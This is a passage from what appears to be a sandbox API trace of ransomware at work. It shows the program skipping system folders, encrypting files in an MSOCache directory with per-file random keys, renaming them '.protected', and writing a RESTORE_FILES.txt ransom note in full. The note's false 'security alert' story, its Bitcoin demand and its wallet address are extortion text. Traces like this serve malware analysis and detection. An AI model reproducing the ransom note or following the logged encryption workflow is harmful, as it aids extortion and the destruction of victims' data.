wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm.protected") returned 87 [0059.623] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm.protected" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm.protected")) returned 1 [0059.624] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0059.624] lstrcmpiW (lpString1="setup.chm", lpString2="Windows") returned -1 [0059.624] lstrcmpiW (lpString1="setup.chm", lpString2="Program Files") returned 1 [0059.624] lstrcmpiW (lpString1="setup.chm", lpString2="Program Files (x86)") returned 1 [0059.624] lstrcmpiW 
(lpString1="setup.chm", lpString2="$Recycle.bin") returned 1 [0059.624] lstrcmpiW (lpString1="setup.chm", lpString2="System Volume Information") returned -1 [0059.624] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 76 [0059.624] StrStrIW (lpFirst="setup.chm", lpSrch=".protected") returned 0x0 [0059.624] lstrcmpW (lpString1="setup.chm", lpString2="RESTORE_FILES.txt") returned 1 [0059.624] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0059.624] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0059.624] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0059.624] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 76 [0059.624] StrStrW (lpFirst="setup.chm", lpSrch=".txt") returned 0x0 [0059.624] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 76 [0059.624] StrStrW (lpFirst="setup.chm", lpSrch=".rar") returned 0x0 [0059.624] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 76 [0059.624] StrStrW (lpFirst="setup.chm", lpSrch=".zip") returned 0x0 [0059.624] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, 
lpOverlapped=0x0) returned 1 [0059.681] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0059.681] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0059.681] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.681] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0059.683] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0059.684] CloseHandle (hObject=0xb4) returned 1 [0059.684] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm.protected") returned 86 [0059.684] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm.protected" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm.protected")) returned 1 [0059.684] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0059.684] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0059.684] lstrcmpiW (lpString1="Setup.xml", lpString2="Program 
Files") returned 1 [0059.684] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files (x86)") returned 1 [0059.684] lstrcmpiW (lpString1="Setup.xml", lpString2="$Recycle.bin") returned 1 [0059.685] lstrcmpiW (lpString1="Setup.xml", lpString2="System Volume Information") returned -1 [0059.685] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0059.685] StrStrIW (lpFirst="Setup.xml", lpSrch=".protected") returned 0x0 [0059.685] lstrcmpW (lpString1="Setup.xml", lpString2="RESTORE_FILES.txt") returned 1 [0059.685] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0059.685] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0059.685] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0059.685] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0059.685] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0059.685] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0059.685] StrStrW (lpFirst="Setup.xml", lpSrch=".rar") returned 0x0 [0059.685] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0059.685] StrStrW (lpFirst="Setup.xml", lpSrch=".zip") returned 0x0 [0059.685] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2488, lpOverlapped=0x0) returned 1 [0059.692] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffdb78, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0059.692] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2488, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2488, lpOverlapped=0x0) returned 1 [0059.692] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.692] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0059.692] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0059.693] CloseHandle (hObject=0xb4) returned 1 [0059.693] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.protected") returned 86 [0059.693] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml.protected")) returned 1 [0059.694] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 
[0059.694] lstrcmpiW (lpString1="ShellUI.MST", lpString2="Windows") returned -1 [0059.694] lstrcmpiW (lpString1="ShellUI.MST", lpString2="Program Files") returned 1 [0059.694] lstrcmpiW (lpString1="ShellUI.MST", lpString2="Program Files (x86)") returned 1 [0059.694] lstrcmpiW (lpString1="ShellUI.MST", lpString2="$Recycle.bin") returned 1 [0059.694] lstrcmpiW (lpString1="ShellUI.MST", lpString2="System Volume Information") returned -1 [0059.694] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 78 [0059.694] StrStrIW (lpFirst="ShellUI.MST", lpSrch=".protected") returned 0x0 [0059.694] lstrcmpW (lpString1="ShellUI.MST", lpString2="RESTORE_FILES.txt") returned 1 [0059.694] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0059.694] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0059.694] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0059.695] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 78 [0059.695] StrStrW (lpFirst="ShellUI.MST", lpSrch=".txt") returned 0x0 [0059.695] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 78 [0059.695] StrStrW (lpFirst="ShellUI.MST", lpSrch=".rar") returned 0x0 [0059.695] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All 
Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 78 [0059.695] StrStrW (lpFirst="ShellUI.MST", lpSrch=".zip") returned 0x0 [0059.695] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0xe00, lpOverlapped=0x0) returned 1 [0059.882] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffff200, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0059.882] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0xe00, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0xe00, lpOverlapped=0x0) returned 1 [0059.883] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.883] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0059.883] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0059.883] CloseHandle (hObject=0xb4) returned 1 [0059.883] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST.protected") returned 88 [0059.883] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST.protected" (normalized: 
"c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst.protected")) returned 1 [0059.884] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0059.884] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0059.884] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\RESTORE_FILES.txt") returned 84 [0059.884] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\RESTORE_FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0059.904] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0059.904] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0059.905] lstrlenA (lpString="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") returned 684 [0059.905] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0059.905] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0059.905] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, 
lpOverlapped=0x0) returned 1 [0059.905] CloseHandle (hObject=0xa4) returned 1 [0059.905] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0059.905] lstrcmpiW (lpString1="{90140000-0117-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0059.905] lstrcmpiW (lpString1="{90140000-0117-0409-1000-0000000FF1CE}-C", lpString2="Program Files") returned -1 [0059.906] lstrcmpiW (lpString1="{90140000-0117-0409-1000-0000000FF1CE}-C", lpString2="Program Files (x86)") returned -1 [0059.906] lstrcmpiW (lpString1="{90140000-0117-0409-1000-0000000FF1CE}-C", lpString2="$Recycle.bin") returned 1 [0059.906] lstrcmpiW (lpString1="{90140000-0117-0409-1000-0000000FF1CE}-C", lpString2="System Volume Information") returned -1 [0059.906] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C") returned 66 [0059.906] lstrcmpW (lpString1="{90140000-0117-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0059.906] lstrcmpW (lpString1="{90140000-0117-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0059.906] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\*") returned 68 [0059.906] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x447cc0 [0060.020] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0060.021] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0060.021] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0060.021] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0060.021] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0060.021] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, 
pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\.") returned 68 [0060.021] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.021] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0060.021] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0060.021] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0060.021] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0060.021] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\." (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0060.021] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0060.021] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0060.021] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0060.021] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0060.021] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0060.021] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0060.021] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\..") returned 69 [0060.021] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0060.021] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.021] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0060.021] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0060.021] 
CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0060.021] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0060.021] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\.." (normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0060.021] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0060.022] lstrcmpiW (lpString1="Access.en-us", lpString2="Windows") returned -1 [0060.022] lstrcmpiW (lpString1="Access.en-us", lpString2="Program Files") returned -1 [0060.022] lstrcmpiW (lpString1="Access.en-us", lpString2="Program Files (x86)") returned -1 [0060.022] lstrcmpiW (lpString1="Access.en-us", lpString2="$Recycle.bin") returned 1 [0060.022] lstrcmpiW (lpString1="Access.en-us", lpString2="System Volume Information") returned -1 [0060.022] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us") returned 79 [0060.022] lstrcmpW (lpString1="Access.en-us", lpString2=".") returned 1 [0060.022] lstrcmpW (lpString1="Access.en-us", lpString2="..") returned 1 [0060.022] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\*") returned 81 [0060.022] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x4a9270 [0060.065] lstrcmpiW (lpString1=".", lpString2="Windows") 
returned -1 [0060.065] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0060.065] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0060.066] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0060.066] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0060.066] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\.") returned 81 [0060.066] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.066] FindNextFileW (in: hFindFile=0x4a9270, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0060.066] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0060.066] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0060.066] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0060.066] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0060.066] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0060.066] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\..") returned 82 [0060.066] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0060.066] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.066] FindNextFileW (in: hFindFile=0x4a9270, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0060.066] lstrcmpiW (lpString1="AccessMUI.msi", lpString2="Windows") returned -1 [0060.066] lstrcmpiW (lpString1="AccessMUI.msi", lpString2="Program Files") returned -1 [0060.066] lstrcmpiW (lpString1="AccessMUI.msi", lpString2="Program Files (x86)") returned -1 [0060.066] lstrcmpiW (lpString1="AccessMUI.msi", lpString2="$Recycle.bin") returned 1 [0060.066] lstrcmpiW (lpString1="AccessMUI.msi", lpString2="System Volume Information") returned -1 
[0060.066] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 93 [0060.066] StrStrIW (lpFirst="AccessMUI.msi", lpSrch=".protected") returned 0x0 [0060.066] lstrcmpW (lpString1="AccessMUI.msi", lpString2="RESTORE_FILES.txt") returned -1 [0060.066] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0060.066] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295eee4*=0x30) returned 1 [0060.066] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0060.215] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 93 [0060.215] StrStrW (lpFirst="AccessMUI.msi", lpSrch=".txt") returned 0x0 [0060.215] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 93 [0060.215] StrStrW (lpFirst="AccessMUI.msi", lpSrch=".rar") returned 0x0 [0060.215] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 93 [0060.215] StrStrW 